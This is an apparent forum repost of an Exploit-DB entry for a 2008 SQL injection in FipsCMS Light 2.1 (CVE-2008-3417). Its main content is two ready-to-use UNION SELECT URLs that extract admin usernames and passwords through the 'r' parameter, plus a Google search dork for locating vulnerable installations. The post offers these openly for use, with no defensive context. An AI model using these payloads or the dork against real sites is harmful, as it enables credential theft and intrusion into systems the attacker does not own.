Exploit FipsCMS Light 2.1 - 'r' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6135
Проверка EDB
  1. Пройдено
Автор
U238
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
cve-2008-3417
Дата публикации
2008-07-26
Код:
Exploit Code:

victim/path/home/index.asp?w=pages&r=9999999 union select all 0,username,null,0x1 from admin

victim/path/home/index.asp?w=pages&r=9999999 union select all 0,password,null,0x1 from admin

http://localhost:2222/lab/cms/_admin

Download:http://login.fipsasp.com/File.asp?ID=60&CatID=5
Found By U238
# Exploit Search Find: ^o)
#
# fipsCMS light - © fipsASP 2003 - 2008. All rights reserved
#
# fipsCMS light - © fipsASP 2003 - 2008
#
# inurl:"fipsASP 2003 - 2008"
# ************************************************ 

# milw0rm.com [2008-07-26]
 
Источник
www.exploit-db.com

Похожие темы